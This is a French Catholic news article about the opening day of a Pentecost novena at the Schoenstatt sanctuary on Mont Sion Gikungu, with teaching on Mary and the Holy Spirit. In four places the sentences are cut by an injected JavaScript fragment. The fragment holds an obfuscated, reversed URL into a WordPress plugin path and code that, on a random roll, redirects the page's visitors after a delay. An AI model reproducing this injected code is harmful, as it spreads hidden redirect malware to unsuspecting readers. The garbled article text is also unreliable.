Voilà enfin le jour, le moment opportun, d’être avec Marie dans Le cénacle, afin de recevoir avec lui l’Esprit Saint. Depuis ce vendredi le 31mai 2019, est commencé au Sanctuaire marial de Schoenstatt, une prière de neuf jours, dans le but de se préparer à la prochaine solennité de Pentecôte.

Le premier jour

Au Mont Sion Gikungu, il est 18heures. Dans l’Eglise de la Sainte Trinité, les fidèles font l’animation avant de commencer une prière de louange. La fraicheur vespérale permet à tout un chacun de se sentir à l’aise. Juste au milieu d’eux, une table bien décorée au blanc, les bougies allumées et les fleurs tout autour.

Tout d’un coup, les animateurs changent la mélodie. Ils entonnent les chants d’accueil et de louange à Marie, et l’image de la Mère Trois fois Admirable est installée au milieu des participants. Ce geste n’est pas moins significatif, parce que ça rappelle la présence de la Vierge Marie au milieu des apôtres, dans la salle en attente de l’Esprit Saint.

Enseignement du jour

L’Expliquant a d’abord fait connaitre le thème principal pour toute la neuvaine : « En effet, tous ceux qu’anime l’Esprit de Dieu sont fils de Dieu. »(Rm 8,14). Il a alors parlé du travail qu’avait effectué le Saint Esprit dans la vie de la Vierge Sainte. Selon lui, Marie a été remplie de l’Esprit de Dieu, pour concevoir et enfanter le Sauveur du monde, le Fils de l’homme, la Parole vivante. «  Le créateur veut qu’aujourd’hui tu portes en toi la Parole, dit-il. C’est pourquoi, a-t-il ajouté, comme Marie, tu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dois accueillir l’Esprit de Dieu. L’Esprit Saint veut demeurer en nous, afin que le Christ soit vivant dans notre vie. »

Comment accueillir et vivre l’Esprit Saint ?

Pour arriver à cette étape  de recevoir  l’Esprit Saint afin qu’il puisse accomplir en nous la volonté de Dieu, nous avons besoin de cheminer avec la Vierge Marie. Le développant a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné quelques démarches qui ont aidé Marie à garde en lui le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don de l’Esprit Saint et qui, sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute, peuvent aider tout un chacun :

-le silence : Humblement et dans le silence de son cœur, Marie dans toute sa vie, ne faisait qu’écouter et  méditer ce qu’elle entendait.

L’engagement : Marie s’était engagée depuis son enfance à garder la chasteté, et voilà que Dieu, par cet engagement, l’a fait Bienheureuse. « A partir de nos engagements, dit le conférencier, Dieu opère des miracles et fait des merveilles. Avec Marie, nous pouvons nous engager. »

Signalons que, du début à la fin de la prière, une pluie non diluvienne est tombée. Est-ce un signe de la bénédiction ?

 

Brigitte IRAKOZE

Laisser un commentaire